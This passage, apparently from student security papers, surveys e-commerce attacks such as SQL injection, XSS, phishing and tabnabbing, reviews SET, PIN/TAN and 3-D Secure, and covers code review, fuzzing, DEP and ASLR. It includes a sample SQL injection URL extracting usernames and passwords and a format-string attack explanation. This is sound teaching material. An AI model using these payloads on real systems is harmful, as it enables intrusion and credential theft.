SQL injection is a common vulnerability resulting from lax input validation. It is an attack on the site itself, in particular its database. The attacker takes advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside those parameters. As a result, attackers can retrieve, modify or even delete data from the database [3], eventually exposing sensitive company data, including customers' credit card numbers and account passwords, to the attacker. Recently, a mass SQL injection attack that depended on sloppy misconfigurations of web servers and back-end databases hit more than one million ASP.NET web pages. It is therefore extremely important for organizations to pay attention to this problem and prevent it. Common preventive measures include looking for SQL signatures in the incoming HTTP stream, observing the SQL communication to build a profile of all allowed SQL queries, and monitoring a user's activity over time to correlate anomalies generated by the same user. E.g.:

http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT username, password FROM USERS
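The query string above works because the attacker-supplied productid is pasted directly into the SQL text. Parameterized queries remove the vulnerability by handing user input to the database driver as data rather than as SQL. A minimal sketch, using Python's built-in sqlite3 as a stand-in for whatever database the shop actually uses:

```python
# SQL injection: string-built query vs. parameterized query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (123, 'widget')")

productid = "123 UNION SELECT username, password FROM users"  # attacker input

# Vulnerable: attacker-controlled text becomes part of the SQL statement.
unsafe = "SELECT id, name FROM products WHERE id = " + productid  # never run this

# Safe: the ? placeholder keeps the input out of the SQL grammar entirely.
rows = conn.execute("SELECT id, name FROM products WHERE id = ?",
                    (productid,)).fetchall()
print(rows)   # [] -- the malicious string simply matches no product id
```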
Price Manipulation

This vulnerability is unique to online shopping carts and payment gateways. Its cause is that the total payable price is stored in a dynamically generated web page, as shown in Figure 2, so an attacker can easily modify the amount using a web application proxy before the information is sent to the payment gateway. Vulnerabilities of a similar kind have also been found where this information is stored in client-side cookies, which can easily be accessed and modified.

Figure 2: Demonstration of Price Manipulation [4]

Buffer Overflow

The overall goal of a buffer overflow attack is to subvert the function of a privileged program so that the attacker can take control of it; if the program is sufficiently privileged, the attacker can control the host. A buffer overflow occurs when a program or process tries to store more data in a buffer than it was intended to hold. The extra information may overflow into adjacent buffers, corrupting or overwriting the valid data held in them, and this has become a vulnerability that attackers are able to exploit. In the excess data written to the targeted buffer, attackers embed code designed to trigger specific actions, sending new instructions to the attacked computer that can damage the user's files, change data or even disclose confidential information.

Buffer overflows are commonly associated with programming languages such as C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not check that data written to an array stays within the boundaries of that array. Manual bounds checking by the programmer is therefore often required to prevent buffer overflow attacks. A buffer overflow attack can be either a stack-based exploitation, which targets the call stack, or a heap-based exploitation, in which the overflow occurs in the heap data area. Besides the manual bounds checking mentioned above, other countermeasures include writing secure code, stack execution invalidation, relying on a compiler with built-in safeguards that try to prevent the use of illegal addresses, and dynamic run-time checks that rely on safety code being preloaded before an application executes.

Remote Command Execution

This vulnerability occurs when an attacker is allowed to execute operating system commands due to inadequate input validation. It is commonly found with the use of system calls in Perl and PHP scripts. Problems arise when script writers assume that users will supply input to their CGI program in the correct format; when a user supplies special meta-characters such as ";" or "|" in the input data, these characters may make the script do things other than what was originally intended. Successful exploitation of the vulnerability may give the attacker the ability to execute arbitrary commands with the elevated privileges of the web server.

Weak Authentication and Authorization

An attacker can use tools to attack authentication systems that do not prohibit multiple failed logins, or websites that use HTTP basic authentication or pass session IDs outside of Secure Sockets Layer. Brute force can be applied if the algorithm involved is simple: one can write a Perl script to enumerate the possible session ID space and break the application's authentication and authorization schemes.

Phishing

Phishing is pronounced the same way as fishing, and it resembles that popular sport: the fisherman casts a hook baited with fish food, hoping that some unsuspecting fish will bite. In phishing, the hacker poses as a trusted source and tries to lure unsuspecting victims to illegitimate websites, where oblivious users enter their personal information. General Internet users have the misconception that phishing scams are conducted only by means of fraudulent email that redirects them to an illegitimate website, giving them a false sense of security that they are safe as long as they avoid clicking any links in email. That is not the case: there are many other ways in which phishing scams are conducted, and it is important to know these techniques in order to safeguard our personal information. We will explore a couple of commonly used phishing scams.

Filter Evasion

Conventional phishing scams use a combination of text and images. However, the prevalence of spam filters subjects phishing mail to greater scrutiny, as the filters can detect text-based phishing content and filter such mail out of the mailbox. As a result, hackers are turning to images to replace the text that carries the phishing information, thereby bypassing the filtering mechanism.

Website forgery

This is the best-known form of phishing, in which the hacker creates a fake website that looks identical to a legitimate one in terms of design, with only a slight variation in the URL. Identifying such a forged website is easy: the user can compare the URL of the trusted website with that of the suspected one, or use a web browser with anti-phishing measures that alert the user to known phishing sites. Unfortunately, while security features have evolved to meet changing security needs, phishing techniques have also evolved to counter the security measures in place.
However, the prevalence of spam filter subjects phishing mail to greater scrutiny as the spam filter is able to detect any text-based phishing contents and thus these mail are filtered out from the mailbox. As a result, hackers are turning into the uses of images to replace text that contains the phishing information, thereby bypassing the filter mechanism. Website forgery This is the most commonly known form of phishing in which the hacker would create a fake website that looks identical to a legitimate website; in terms of website design with only slight variation in the URL. Identification of a forged website is easy; user could compare the URL of trusted website to the suspected website or using web browser that supports anti-phishing measure that alerts user to known phishing sites. Unfortunately, while security features evolved to meet changing security needs, phishing techniques have also evolved to counter security measures in place. Website forgery has evolved; hackers have come up with ingenious to exploit on the user 247 common perception that a website is safe from forgery as long as the URL of the site matches those of a legitimate site. This is achieved by means of a Javascipt that runs when users click on a link which redirects them to a phishing website; the Javascript suppresses the address bar and replaces it with a fake address bar, which displays the address of the trusted website rather than the address of the phishing site [5]. Tabnabbing This is a term coined by Aza Raskin, creative lead of Firefox, on his blog where he demonstrated a proof-of-concept on this new phishing technique. According to Raskin, this technique works on the tabbed features provided by most browsers. It begins when a user enters a normal looking website (where the phishing scripts are going to run) and then for whatever reason, he decides to navigate away from the current tab to open up a few other tabs. During this time, the scripts running on the phishing site detect inactivity on the page and then begin running codes that replace the site contents; favicon, title and appearance to something a user would be familiar with. Take for example, a bogus Gmail website requesting for login information, which looks very similar to the legitimate website. When the user browses through the open tabs he chances upon the familiar Gmail favicon, and as described by Raskin that "memory is malleable and moldable", the user assume that he has indeed open the Gmail tab and unsuspectingly enters his login information into the phishing site. This attack could be extended to other form of web services, most notably social networking sites, bank websites and ecommerce websites. Furthermore, Raskin stated that the attack could be customized to detect web services accessed by the victim and then generate web pages dynamically to fit the user [6]. Pop-up on legitimate website This attack targets the vulnerability of javascript pop-up found in web browser where dialog boxes bearing no information of their origin could to be opened. The scam begins with the user clicking on a link from a malicious website or email. The link then directs the user to a legitimate website thereafter a pop-up requesting for login information would appear as an overlay on the legitimate website. A similar variation of this attack known as session phishing, involved the use of a malware that injects malicious code into browser. 
This attack begins with the user logging into a legitimate banking site; the malware detects the web service being accessed and displays a pop-up prompt claiming that the session has expired and requesting user input to renew it. Both of these attacks have a higher rate of success because they happen on the legitimate website, so users who receive the unauthorized prompts tend to perceive the request as legitimate.

Evil twin

Evil twins are wireless networks created by phishers to confuse users by offering access points with the same names as legitimate ones, in the hope of luring unsuspecting users onto the rogue network. The attack is common in places with wireless hotspots. The phisher begins by scanning an area for an access point to target, and then impersonates it. Unsuspecting users accessing the rogue network are fooled into believing that they are on the legitimate network and that their transactions are therefore secure; in actual fact the integrity of their data has been compromised, as the information is routed through the illegitimate network. Setting up the bogus network is relatively simple and hard to detect: a phisher can set up an evil twin wireless network using a laptop and can easily shut it down whenever he feels his identity is compromised.

Pharming

Pharming is very similar to phishing; both use bogus websites and attempt to steal personal information from their victims. The main difference is that while the majority of phishing scams can be detected by paying close attention to discrepancies in the web address, pharming redirects legitimate web traffic to an illegitimate site regardless of whether the user inputs the correct address. Pharming is thus much harder to detect than phishing. The redirection can be achieved by means of Trojans, worms or viruses that attack the web browser's address handling, so that valid addresses of legitimate websites are modified into illegitimate ones. Another method of redirecting web traffic is DNS poisoning. This attack takes advantage of the facts that DNS has no means of validating the integrity of the data it receives and that DNS data is cached for optimization. The hacker corrupts the DNS server by introducing incorrect entries that spoof the legitimate addresses of entries in the server and redirect them to a server he controls. As a result, web requests for legitimate websites are redirected to the bogus website set up by the hacker.

Cross-site scripting

Cross-site scripting (XSS) is an attack technique targeting the web browser on the client side. An XSS attack exploits vulnerabilities in web applications that allow an attacker to inject client-side scripts into users' web browsers. These scripts, once injected and run in the client browser, can carry out malicious acts: recording keystrokes, stealing history, accessing session cookies and many others. XSS attacks fall under two main categories, persistent and non-persistent.

Non-persistent

A non-persistent XSS attack begins with the hacker attempting to identify a flaw in a trusted website that is susceptible to XSS. Once an attack vector has been identified, the hacker scripts an attack to exploit the vulnerability of the identified vector. The completed script is inserted into a specially crafted link.
This seemingly harmless link contains a URL that points to the trusted website together with the malicious script that will run in the client browser when it is clicked. The hacker then begins spreading the crafted link through websites, forums and email spam. Because the link points to the trusted website, it is likely to deceive even experienced users into accessing it with no knowledge that an attack is taking place. Fortunately, non-persistent XSS attacks can be avoided easily: a general rule of thumb for users accessing sensitive information on the web is to avoid clicking on unsolicited links and to access trusted web pages only through well-formed URLs they entered themselves.

Persistent

Unlike a non-persistent XSS attack, a persistent XSS attack does not require a crafted URL. The hacker first creates exploit code, using JavaScript or any other scripting language. The attack code is then submitted to websites where it can be stored for an extended period of time and accessed by many visitors; common places where attack code can be submitted are forums, wikis, blog comments, user reviews and many other locations [7]. When users access the "infected" pages containing the exploit code, the code executes automatically, giving the user no chance to defend against the attack. A persistent XSS attack is dangerous and hard to defend against. Firstly, hackers can carry out the attack stealthily: the content within a <script> tag does not display itself in the web page, so it is difficult for a user to detect whether a particular page is "infected". Secondly, because the exploit code is stored on the server, it can exist indefinitely until it is removed and thus has a greater chance of infecting users. The situation is worsened by the fact that high-traffic websites are the usual targets of persistent XSS attacks, allowing them to infect many users in a relatively short amount of time.
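The standard defence against stored payloads of this kind is to escape user-supplied content whenever it is written back into a page. A minimal sketch using Python's standard html module; the cookie-stealing payload is illustrative, and a real application would normally rely on its template engine's auto-escaping rather than manual calls.

```python
# Output escaping turns an injected <script> payload into inert text.
import html

comment = ('<script>document.location='
           '"http://evil.example/?c=" + document.cookie</script>')

page = "<div class='comment'>" + comment + "</div>"   # vulnerable: runs as code
safe_page = "<div class='comment'>" + html.escape(comment) + "</div>"

print(safe_page)
# The angle brackets and quotes arrive as &lt; &gt; &quot; etc., so the
# browser renders the payload as harmless text instead of executing it.
```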
4 Analysis of Current Systems

SET Protocol

Despite the undisputed recognition of SET's importance in e-commerce security, there are still defects in the current protocol. Firstly, the SET protocol does not specify how to preserve or destroy data after each transaction, or determine where the data should be saved; this can become a vulnerability for a hacker to attack. Besides that, it does not resolve disputes between the parties involved, namely the cardholder, merchant, issuer, acquirer, payment gateway and certification centre; whenever there is a dispute, SET has no rules to help resolve the situation. The problem is compounded by the lack of time information in the current protocol, which does not record when transactions are processed; this information would be useful in disputes, as it can provide legal evidence. Last but not least, there is the concern over the use of weak 56-bit DES, adopted because of the computational cost of asymmetric encryption (IBM, 1998). Several suggestions have therefore been made to improve the current protocol.

First and foremost, a data destruction mechanism can be added to the protocol to ensure that sensitive data is destroyed after the transaction, with only one copy saved on a storage server for further reference. This ensures that the data cannot be found on the computers of the parties involved, but is accessible only through the storage server. The same mechanism can also record other useful information, such as the transaction time, which may be useful to the various parties as mentioned above (The Improvement of SET Protocol based on Security Mobile Payment, 2011).

PIN/TAN System

The PIN/TAN system is an authentication scheme widely used in the e-commerce world nowadays, especially in Internet banking. Some banks have gone a step further by providing users with a TAN generator token, which reduces the risk of the entire TAN list being compromised. However, this does not change the fact that the PIN/TAN system is inherently insecure, as demonstrated by several students at a German university (Outflanking and securely using the PIN/TAN system). They showed that performing the attack requires no special hacking skills, only some experience with online banking and some basic programming knowledge. Basically, the attack requires the attacker to infect the target's system with a computer virus or a Trojan containing a spy that lurks hidden in the background and eavesdrops on the computer's hardware input (keyboard and mouse) to obtain the required information: the account number, the PIN and finally the TAN. Once these sensitive data have been acquired, the spy closes the web browser before the TAN is sent to the bank server, ensuring that the TAN stays valid; the attacker can then use the stolen information to transfer money out of the target's account. This attack is possible for several reasons. One is that the sensitive data are typed into the computer in clear text, allowing the attacker to acquire valid authentication data simply by stealing the target's input. Beyond that, the PIN/TAN system is not immune to common Internet threats such as phishing.

3-D Secure

3-D Secure is designed as an extra layer of security for online transactions involving debit and credit cards. Despite the claims of better security made by Visa, the protocol's developer, it has several well-known flaws that have brought it under attack on numerous occasions. Nevertheless, it is probably the largest single sign-on system ever deployed. Its first, and perhaps most fatal, weakness is the 3DS form itself, which is an iframe or pop-up without an address bar, so a customer cannot verify where the form has come from. This goes against the advice given to the public on preventing phishing attacks, and it also makes attacks against 3DS easier (e.g., man-in-the-middle attacks). Its second weakness is the activation-during-shopping (ADS) mechanism, in which customers are asked to fill in an ADS form to verify that they are the authorized cardholder. As a result, it is easy for an attacker to impersonate the ADS form and request all this sensitive data from the customer, who sees merely an online shopping website asking for personal details.
Besides that, there is also a mechanism that helps the customer verify that he is talking to the actual bank, by displaying a phrase he chose during the ADS process; however, this mechanism makes 3DS even more vulnerable to a MITM attack (Verified by Visa and MasterCard SecureCode: or, How Not to Design Authentication).

5 Different Ways to Pay Online

Disposable Credit Cards

Disposable credit cards have been around for quite some time, but many people are still unaware of their existence. American Express was the first bank to introduce them, in September 2000 [8]. Many other banks have since offered disposable credit cards, yet they are not widely known or utilized. Disposable cards can be applied for at any bank that offers them, and a customer can hold a number of them under one credit card account, using different cards with different merchants for e-transactions. The main idea behind disposable credit cards is that they function as aliases for the original credit card: if one of the disposable cards is compromised, the hacker learns nothing about the original card number. Disposable credit cards seem a plausible way to secure e-transactions, yet they are not widely used. One reason could be the administrative procedures involved in maintaining them: the cards must be renewed annually, and considering that a user could own several, the trouble of maintaining them offsets the benefits they provide.

Prepaid Credit Cards

A prepaid credit card is similar to any other prepaid card, allowing the user to make purchases with a sum of money pre-loaded onto the card. Prepaid credit cards come in two forms, "reloadable" and "non-reloadable": the former lets the user add funds to the card's balance, while the latter does not. These cards can be purchased without a bank account or credit card, and the user makes purchases using the value stored on the card, which functions the same way as an actual credit card (except that it does not provide purchases on credit). This method of payment minimizes the loss incurred by the user if the card number is compromised. Furthermore, Visa's zero-liability policy, which protects users from unauthorized charges on their cards, also applies to prepaid cards. An interesting point to note is the underlying cost of using these cards, which includes the cost of adding value (for reloadable cards) and the cost of the card itself (for non-reloadable cards) [9].

MasterCard SecureCode

SecureCode is a service provided by MasterCard to improve e-transaction security; it seeks to protect against the unauthorized use of credit cards at participating online retailers [10]. Any MasterCard holder can register an existing credit or debit card for the service and receive a SecureCode upon completion. When a user confirms a purchase on an e-commerce site that offers the service, he is prompted to input his SecureCode; this code is unique to the user and serves to verify his identity before the transaction is allowed to take place.
An additional feature of SecureCode is that it acts as a medium between customer and retailer, meaning that the customer's credit card number is not revealed to the merchant during the transaction. However, SecureCode has its limitations: it applies only to participating online retailers that have opted to implement it in their transaction systems. Users' choices are thus limited to the list of participating merchants, and the coverage of the service will remain limited unless more retailers decide to implement SecureCode.

Online Payment Services

Online payment services such as Google Checkout (checkout.google.com) and Amazon Payments (payments.amazon.com) are web services that handle transactions between customers and online retailers. One might question the necessity of having these middleman websites handle transactions that could already be completed on the retailer's website. To some extent these sites do indeed just handle transactions, but we must also take note of the underlying security features they offer, which can better protect our credit card information. Users who sign up for one of these payment services must first have a certain level of trust in the service's ability to secure their data. By entrusting the sites with personal information, users leverage the expertise and security technologies implemented on these sites to carry out secure transactions; put another way, there is a shift in security responsibility from the user to the payment website. Transactions carried out through a payment website are safer in the sense that the user's credit card information is not exposed to the merchant during the payment process, preserving the confidentiality of the card number. However, we must also be aware that by using these websites we are assuming that the owners of the services protect our personal information to the best of their ability, which might not be the case.

6 Conclusion

Electronic transactions have become an integral part of today's commerce. Banking institutions and companies worldwide have jumped on the bandwagon in the hope of reaping large financial benefits from the current systems, and the security of such systems has accordingly become a growing concern for the parties involved. We have observed that no existing system can be considered fully secure: all of these systems and protocols have their own strengths and weaknesses. Many companies are making proactive efforts to develop better and more secure systems, so improved systems and protocols can be expected in the future.

7 References

1. Atul Kahate: Security and Threat Models: Secure Electronic Transaction (SET) Protocol (2008). http://www.indicthreads.com/1496/security-and-threat-models-secure-electronictransaction-set-protocol/
2. 3-D Secure. http://www.web-merchant.co.uk/optimal%20technical%20data/3D_secure_Guide.pdf
3. SQL Injection. http://dev.mysql.com/tech-resources/articles/guide-to-php-security-ch3.pdf
4. Common Security Vulnerabilities in E-Commerce Systems. http://www.symantec.com/connect/articles/common-security-vulnerabilities-ecommerce-systems
5. British Broadcasting Corporation (BBC): Phishing con hijacks browser bar (2004). http://news.bbc.co.uk/2/hi/technology/3608943.stm
6. Raskin, A.: Tabnabbing: A New Type of Phishing Attack (2010). http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
7. Fogie, S., Grossman, J., Hansen, R., Rager, A., & Petkov, P.: XSS Attacks (2007), p. 75. http://books.google.com/books?id=dPhqDe0WHZ8C&hl=en
8. Linsey, R.: Disposable Credit Card Numbers (2001). http://www.cardratings.com/feb01new.html
9. White, M.C.: Credit Cards for Kids? Don't Be Childish (2011). http://moneyland.time.com/2011/10/25/why-parentsshouldnt-give-their-kids-a-credit-card/
10. MasterCard: Support: SecureCode(TM) FAQs. http://www.mastercard.us/support/securecode.html
11. Secure Electronic Transactions (SET). http://searchfinancialsecurity.techtarget.com/definition/SecureElectronic-Transaction
12. Electronic Transaction. http://netlab.cs.iitm.ernet.in/cs648/2009/assignment1/rajan.pdf
13. Ganesh Ramakrishnan: Secure Electronic Transaction (SET) Protocol. http://www.isaca.org/Journal/Past-Issues/2000/Volume-6/Pages/Secure-ElectronicTransaction-SET-Protocol.aspx
14. 3-D Secure. http://www.3dtrust.com/
15. 3-D Secure Integration. http://www.advansys.com/default.asp/p=87/3D_Secure
16. Secure Online Banking. http://www.nationwide.com/secure-online-banking.jsp
17. Buffer Overflow. http://searchsecurity.techtarget.com/definition/buffer-overflow
18. The Improvement of SET Protocol Based on Security Mobile Payment. http://www.aicit.org/jcit/ppl/03_10.4156jcit.vol6.issue7.3.pdf
19. Analysis of SET and 3-D Secure. http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908626
20. SET Criticism. http://www.wolrath.com/set.html#3.4.1_Delays,%20_delays,_delays_!
21. Improving the Secure Electronic Transaction Protocol by Using Signcryption. http://www.signcryption.org/publications/pdffiles/HanaokaZhengImai-e84a_8_2042.pdf
22. Secure Electronic Transactions: An Overview. http://www.davidreilly.com/topics/electronic_commerce/essays/secure_electronic_transactions.html

A Review of the Techniques Used in Detecting Software Vulnerabilities

Nicholas Kor, Cheng Du
National University of Singapore

Abstract. This paper reviews a few common methods of detecting software vulnerabilities and their use in detecting the presence of some of the more prevalent vulnerabilities. We also survey methods used to mitigate the amount of damage that can be done by a compromised program.

1 Introduction

Vulnerabilities present in the design of programs allow attackers to reduce the integrity, assurance and availability of the program through exploitation. Careful analysis of the program code for vulnerabilities greatly reduces the likelihood of successful malicious exploitation, resulting in a more secure and stable program and preserving the health of the rest of the system that interacts with it. In this paper we outline common methods of testing programs for vulnerabilities and their use in detecting a few of the more common vulnerabilities present in software. We also review methods used to prevent compromised programs from damaging the systems they reside in.

2 Detecting Vulnerabilities in Software

2.1 Code Review

Code review, at its simplest, is an examination of the code by the author or someone else to find faults, both security-related and otherwise, and repair them. There are several types of code review, with varying levels of formality and manpower involved; describing the different types is outside the scope of this paper.
Static code analysers, which have a section of their own in this paper, are also often used in large projects to aid in checking for known vulnerabilities. While checking that the code does what it is supposed to do is obvious and routine, checking that the code does only what it is supposed to do and nothing more is less so. The additional "and nothing more" requirement ensures that the code is checked for security as well as functionality [1].

Evidence suggests that code review can be more effective than dynamic testing, the testing of software through the execution of test data. For example, the software engineering researcher Jones [2] summarized the data in his large repository of project information to paint a picture of how reviews and inspections find faults relative to other discovery activities. Because products vary so widely in size, the table below presents fault discovery rates relative to the number of thousands of lines of code in the delivered product. The numbers seem to indicate that code review outstrips all other forms of fault detection in the number of faults found.

Table 1. Faults found during discovery activities.

Discovery Activity       Faults found (per thousand lines of code)
Requirements review      2.5
Design review            5.0
Code inspection          10.0
Integration testing      3.0
Acceptance testing       2.0

Of course, the effectiveness of code review in detecting vulnerabilities depends highly on the skills of the reviewer. Ideally, the reviewer should possess computer security expertise in addition to being a competent programmer familiar with the source code. However, not all organisations have the luxury of recruiting people with the needed computer security skills, and this may cause the security of the software to be neglected when the code is reviewed.

2.2 Using Automated Tools

Automated tools can be used to aid the detection of software vulnerabilities. Static program analysers are able to detect bugs in code, such as the presence of memory leaks. Lint [3] is a classic example of a static analyser used to detect errors in C source code. Some static analysers can analyze the behaviour of a program, typically its control flow and data flow, and translate that behaviour into a representation that can be easily understood by a reviewer. This function is especially valuable to a reviewer who is not part of, or is new to, the development team and has no prior knowledge of the code, as it helps him understand the code in a shorter amount of time. Other static analysers can be configured with the express purpose of finding software vulnerabilities, such as detecting the use of unsafe and deprecated library functions.

As with any man-made tool, static analysers are never perfect: even the better-written ones produce false positives (wrongly reporting acceptable code as vulnerable) and false negatives (failing to detect vulnerable code) from time to time, necessitating manual verification of the warnings given. Such automated tools should therefore be used in conjunction with code review and code testing, never on their own.

2.3 Negative or Non-Functional Testing

Testing of code is an integral part of the software development process.
The code is usually subjected to different levels of testing: unit testing, where each module of the code is tested for functionality; integration testing, where the code is tested after integrating two or more of its component modules; and regression testing, where the code is tested after a version change to ensure that enhancements or bug fixes do not introduce new bugs. Negative testing [4], however, involves verifying the stability of the program by checking the results of providing invalid or malformed data as input. Causing the program to crash or raise an unhandled exception could indicate the presence of vulnerabilities. The test data should be fed through all of the ways the program accepts information, be it command line arguments, input boxes or even network packets. This is in line with the earlier concept of checking that the program only does what it should and nothing more. In later parts of this paper, we will present examples of how negative testing can be used to reveal the presence of some of the more common vulnerabilities in code.

One specific type of negative testing is fuzz testing [5], where the test data is randomly generated. This saves time by automating the generation of test cases, but a possible disadvantage of this method is that rare boundary cases that do not arise during normal operation of the program may go undetected. To remedy this, special test cases targeting these boundary cases can be crafted and used in conjunction with the random inputs.

3 Common software vulnerabilities and security faults

3.1 Buffer Overflows

Buffer overflows are software faults that occur when the amount of data being written to a buffer is more than the buffer can contain. The data overflows the buffer and overwrites the memory following the end of the buffer. When used as an attack vector, the area of memory following the overrun buffer has usually been determined by the attacker to have some special significance — for example, it contains system code that he can overwrite, or a return address which he can replace. The attacker then uses this vulnerability to inject his own code into the memory area of interest, typically with the aim of running his chosen programs with higher privileges.

The C programming language is particularly susceptible to buffer overflows because it does not bounds-check buffers and because many of the functions provided by the standard C library are unsafe: the programmer needs to explicitly confirm that the size of the data being read is always smaller than the buffer it will be written to [6]. Some of the unsafe library functions are the strcpy, strcat, gets and sprintf functions [7,8].

The detection techniques outlined in the previous sections can be applied to detect the presence of buffer overflow vulnerabilities. For example, the use of these unsafe functions can be spotted during code review, and the code can be rewritten to use safe versions of these functions, if available, or to use the functions in a safe manner. This process can also be automated through the use of static code analysers or similar tools. Splint [9], a tool for statically checking C programs for security vulnerabilities and coding mistakes, can be configured to detect whether the unsafe library functions are used. Splint can also be used in conjunction with annotated pre- and post-conditions in the source code to check that the function calls are used in a safe manner, if these functions absolutely have to be used.
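To illustrate the fault being discussed (a minimal sketch, not code from any reviewed project), the following C program overruns a stack buffer when given a long argument, and shows a bounded alternative that a review would suggest:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char unsafe[16];
        char safe[16];

        if (argc < 2) return 1;

        /* Unsafe: strcpy copies until the NUL terminator, however far
           away it is; an argument longer than 15 bytes overwrites the
           adjacent stack memory, possibly including a return address. */
        strcpy(unsafe, argv[1]);

        /* Safer: copy at most sizeof(safe)-1 bytes and terminate
           explicitly, so the buffer can never be overrun. */
        strncpy(safe, argv[1], sizeof(safe) - 1);
        safe[sizeof(safe) - 1] = '\0';

        printf("%s\n", safe);
        return 0;
    }

A static analyser such as Splint would flag the strcpy call above; the strncpy version still deserves review, since silent truncation can itself be a fault.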
3.2 Failing to handle invalid inputs

The failure to handle, or the improper handling of, invalid inputs is a recipe for disaster. Here we outline two specific software vulnerabilities in this class of software faults, both of which stem from, or can be exploited by, failing to handle specially crafted user input.

3.2.1 Uncontrolled Format String

Most programming languages include functions to format data for output. In most languages, the formatting information is described using some sort of string, called the format string. The vulnerability arises when programmers use data from external, untrusted sources directly as the format string [10]; as a result, attackers can enter format strings as input to the program, causing many problems. The C programming language is one of the languages that use format strings — in the printf family of functions — making it susceptible to this type of exploit. Take for example the statement:

    printf(string_from_untrusted_user);

By using the format specifier "%x" in a format string that is input into the program, the attacker can inspect the program stack 4 bytes at a time. Another format specifier with a potentially dangerous function is "%n"; using it, the attacker is able to write 4 bytes to the stack [11]. Thus, using a combination of the two format specifiers, the attacker can insert his own code into the stack to be executed, or replace a return address to point to some other code in the system.

During code review, one could simply check for misuse of the formatted output printing functions. Static code analysers such as Splint, mentioned above, are also able to detect improper usage of these functions. Negative testing can be used in black-box situations where the code is unavailable: testers can simply pass potentially unsafe format specifiers, such as the "%x" case detailed above, and check whether hexadecimal values are returned.
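As a concrete sketch (assumed illustrative code, deliberately containing the vulnerability), the difference between the unsafe and the correct call is a single argument; modern compilers warn about the first form with options such as -Wformat-security:

    #include <stdio.h>

    void log_message(const char *user_input) {
        /* Vulnerable: user_input is interpreted as a format string, so
           an input of "%x %x %x" leaks stack words and "%n" writes to
           memory. Reading missing varargs is undefined behaviour. */
        printf(user_input);

        /* Correct: the format string is a constant, and user_input is
           printed as plain data whatever specifiers it contains. */
        printf("%s", user_input);
    }

    int main(void) {
        log_message("%x %x %x");
        return 0;
    }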
3.2.2 SQL Injections

Nowadays it is common for programs to manage their data through SQL, a portable database query language. This opens up a new way to exploit a program that does not properly validate user input. For example, a program may ask the user for authentication before displaying sensitive data; if the program uses SQL to check the user's credentials but fails to validate the input, a successful SQL injection attack may give the attacker unauthorized access to the sensitive data. Suppose the program asks for the user's name and password, saves them in the variables $name and $password, and concatenates the information provided with a string literal to construct the following SQL statement to pass to the SQL interpreter:

    Select * from user where name=$name and password=$password

This use of string concatenation allows the attacker to pass his own SQL queries to the system to be executed. With a little guesswork, the attacker will be able to access, modify and delete data in the database. When doing a code review, portions of code that fit the following pattern are vulnerable to SQL injection: the code takes user input, does not validate the input, uses the input directly to query the database, and uses string concatenation to build the SQL query. Negative testing, by supplying malformed inputs to the program, also reveals whether the program is vulnerable to such an exploit. Of course, all of this only applies to code that interfaces with a database; any program that does not is obviously free of such vulnerabilities.
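A standard remedy that reviewers look for is the use of parameterised queries instead of string concatenation. The sketch below (using SQLite's C API; the table and column names are illustrative assumptions, not from any audited program) binds the user-supplied values so the database never interprets them as SQL:

    #include <sqlite3.h>

    /* Returns 1 if a matching row exists, 0 if not, -1 on error. */
    int check_login(sqlite3 *db, const char *name, const char *password) {
        const char *sql =
            "SELECT 1 FROM user WHERE name = ? AND password = ?";
        sqlite3_stmt *stmt;
        int found;

        if (sqlite3_prepare_v2(db, sql, -1, &stmt, NULL) != SQLITE_OK)
            return -1;

        /* Bound values are treated purely as data; input such as
           "' OR '1'='1" cannot change the structure of the query. */
        sqlite3_bind_text(stmt, 1, name, -1, SQLITE_STATIC);
        sqlite3_bind_text(stmt, 2, password, -1, SQLITE_STATIC);

        found = (sqlite3_step(stmt) == SQLITE_ROW) ? 1 : 0;
        sqlite3_finalize(stmt);
        return found;
    }

(Storing plaintext passwords, as the paper's example implies, is itself a fault; a real system would compare salted hashes.)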
4 Other methods to ensure that programs do not damage the system

4.1 Checking if the program is run with the lowest possible privileges

Programs such as web servers or daemons should always run under the lowest possible privilege levels. This reduces the damage if the program is compromised by a malicious attack. For example, the Apache HTTP Server can be configured to refuse to start if it detects that it is being run with administrator privileges, because a restricted user privilege is sufficient for the server to perform its tasks. Ensuring that a program implements such a privilege check helps reduce the damage to the system should an attack succeed.

4.2 Running the program in a sandbox

A sandbox is a common mechanism for separating a program from the actual system, and is a specific example of virtualization. Its use is widespread among major antivirus software for the detection of malicious programs. When a program runs inside a sandbox, the resources it uses are tightly controlled by the sandboxing software; if the running program is compromised, the damage does not extend beyond the sandbox and can be easily identified for further analysis. A typical example of a sandbox for vulnerability testing is to launch the program inside virtual machine software such as Oracle VirtualBox, closely monitoring the system resources utilized, the I/O patterns, the network access and so on. With the statistics collected from the running program, its access patterns can be analyzed and any suspicious behaviour identified.

4.3 Checking If the System Uses Data Execution Prevention

Many modern operating systems, such as Microsoft Windows, have a security feature called Data Execution Prevention [12], which prevents the data section of a protected program from being executed. Because a typical buffer overflow attack involves overwriting the data section of the victim program with malicious instructions and tricking the victim program into jumping to these instructions, ensuring that the program under test utilizes this technology greatly reduces the chance of a successful attack on the program.

4.4 Checking That the System Uses Address Space Layout Randomization

Another security feature common to modern operating systems is Address Space Layout Randomization (ASLR). It randomizes the addresses of system data structures and the positions of system libraries in a process's address space. This complicates remote code execution: a malicious attacker trying to inject code will have a hard time predicting the address of a system library or accessing system data structures. Furthermore, a wrong prediction will almost always crash the attacked process, preventing the attacker from simply trying another address. For example [13], since Windows Vista introduced ASLR, many attack techniques that worked well on Windows XP have only a 1 in 256 chance of working on the newer system. Any trial on the other 255 wrong memory locations will crash the attacked process, preventing the attack from trying other possibilities as well as alerting users to the unusual crashing behaviour, which might lead to the discovery of the attacker.

4.5 Ensuring That the Program Does Not Use Injected Compromised Code By Mistake

